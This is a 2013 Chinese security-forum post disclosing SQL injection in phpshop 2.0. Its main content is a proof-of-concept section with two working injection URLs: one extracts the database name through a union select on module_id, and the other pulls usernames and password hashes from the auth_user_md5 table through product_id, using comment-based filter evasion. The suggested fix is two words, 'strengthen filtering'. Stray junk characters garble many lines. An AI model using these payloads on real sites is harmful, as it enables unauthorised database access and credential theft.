找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2079|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability0 e0 O9 [: z6 I) P

" Y: l. K9 H4 R& d7 A# W作者 : By onestree( p* _% ?$ c6 Q: D) x4 U
下载地址 : http://code.google.com/p/phpshop/downloads/list
, b% T2 E$ A2 {) T测试地址: windows 7 / ubuntu% n+ X$ s: e, a
8 c4 m& Z8 |6 W  A$ r/ C

9 \* A9 O% q) s9 XSQLi p0c:! m2 H5 d" V$ h

! r4 N6 }% \; _" n" o8 O==================; a0 Y0 `7 b3 m% }
6 u/ _4 L- e- h8 b
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
9 x' |: L+ W- W" |union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --5 `0 S0 i! R1 O! l

1 n* M! `% `& f: f* _http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& u! k/ V2 L( p3 R& ?4 T/ U, b$ H8 p( ?; k
修复:! ?# ]8 i' C/ _5 ^7 K* s; E3 D
加强过滤) T5 [3 A- R' E# `, K# I

/ N: [5 n& B* o( V) t& G0 \) Q7 u: O/ h+ D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表